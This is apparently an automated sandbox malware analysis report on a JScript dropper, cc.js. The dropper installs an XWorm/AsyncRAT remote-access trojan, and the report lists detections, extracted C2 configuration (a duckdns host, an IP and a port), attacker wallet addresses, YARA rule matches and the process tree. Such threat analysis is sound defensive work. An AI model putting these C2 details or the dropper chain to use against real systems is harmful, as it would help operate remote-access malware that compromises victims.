Windows Analysis Report
cc.js

AV Detection

Source: cc.js

Avira: detected

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Service.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}

Source: cc.js	ReversingLabs: Detection: 39%
Source: cc.js	Virustotal: Detection: 31%			Perma Link

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Service.exe	Joe Sandbox ML: detected

Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: as525795.duckdns.org,194.37.97.150
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: 6980
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: <123456789>
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: XWorm V5.3
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: adobe.exe
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: bc1q6ctx30m7yf3swhuskp3n34awjtnxw7974qewyh
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: 0x344Bc250C2901d36f2FD4698632D289B9977BEd6
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: BLMpkfcDYXR1q2bgbj2mBPk9uQsgAVc6vdv62zRuMAHN

Compliance

Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: Malware configuration extractor	URLs: as525795.duckdns.org
Source: Malware configuration extractor	URLs: 194.37.97.150

Source: unknown

DNS query: name: as525795.duckdns.org

Source: unknown

DNS traffic detected: query: as525795.duckdns.org replaycode: Server failure (2)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: as525795.duckdns.org

Source: GeUT.exe, 00000008.00000002.2286549047.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: GeUT.exe, 00000003.00000002.3410104953.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 2_2_00C90D30		2_2_00C90D30
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_00AE2B36		3_2_00AE2B36
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_00AE13B8		3_2_00AE13B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_00AE3B2E		3_2_00AE3B2E
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA947C		3_2_04EA947C
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA6CA8		3_2_04EA6CA8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA8878		3_2_04EA8878
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA5B18		3_2_04EA5B18
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EAC5D0		3_2_04EAC5D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA33C4		3_2_04EA33C4
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA9D10		3_2_04EA9D10
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA4EA0		3_2_04EA4EA0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA4E90		3_2_04EA4E90
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_018743D0		4_2_018743D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01877288		4_2_01877288
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01875208		4_2_01875208
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01870D32		4_2_01870D32
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01876450		4_2_01876450
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_0187727C		4_2_0187727C
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_0187644A		4_2_0187644A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 5_2_02E113B8		5_2_02E113B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 6_2_011B13B8		6_2_011B13B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 7_2_00FA13B8		7_2_00FA13B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 8_2_008813B8		8_2_008813B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 9_2_029113B8		9_2_029113B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B37288		11_2_00B37288
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B35208		11_2_00B35208
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B343D0		11_2_00B343D0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B36450		11_2_00B36450
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B30D33		11_2_00B30D33
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 11_2_00B3727C		11_2_00B3727C
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 13_2_00E113B8		13_2_00E113B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 14_2_00C113B8		14_2_00C113B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 15_2_012313B8		15_2_012313B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 16_2_014213B8		16_2_014213B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02735208		17_2_02735208
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02737288		17_2_02737288
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_027343D0		17_2_027343D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02736450		17_2_02736450
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02730D33		17_2_02730D33
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_0273727C		17_2_0273727C
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_02736080		17_2_02736080
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 17_2_027361C8		17_2_027361C8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 19_2_017513B8		19_2_017513B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 21_2_030613B8		21_2_030613B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 22_2_012F13B8		22_2_012F13B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B961BC		24_2_00B961BC
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B95208		24_2_00B95208
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B97279		24_2_00B97279
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B943D0		24_2_00B943D0
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 24_2_00B90D32		24_2_00B90D32
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 25_2_04B413B8		25_2_04B413B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 26_2_02DC13B8		26_2_02DC13B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 27_2_00CE13B8		27_2_00CE13B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 28_2_012213B8		28_2_012213B8
Source: C:\Users\user\AppData\Roaming\Service.exe	Code function: 29_2_016513B8		29_2_016513B8

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\GeUT.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Service.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996

Source: cc.js

Initial sample: Strings found which are bigger than 50

Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: GeUT.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Service.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: GeUT.exe.0.dr, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Service.exe.2.dr, Program.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winJS@49/5@3/0

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

File created: C:\Users\user\AppData\Roaming\Service.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Service.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Mutant created: \Sessions\1\BaseNamedObjects\wtYmVE2WY2XGhWlO

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\GeUT.exe

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cc.js	ReversingLabs: Detection: 39%
Source: cc.js	Virustotal: Detection: 31%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
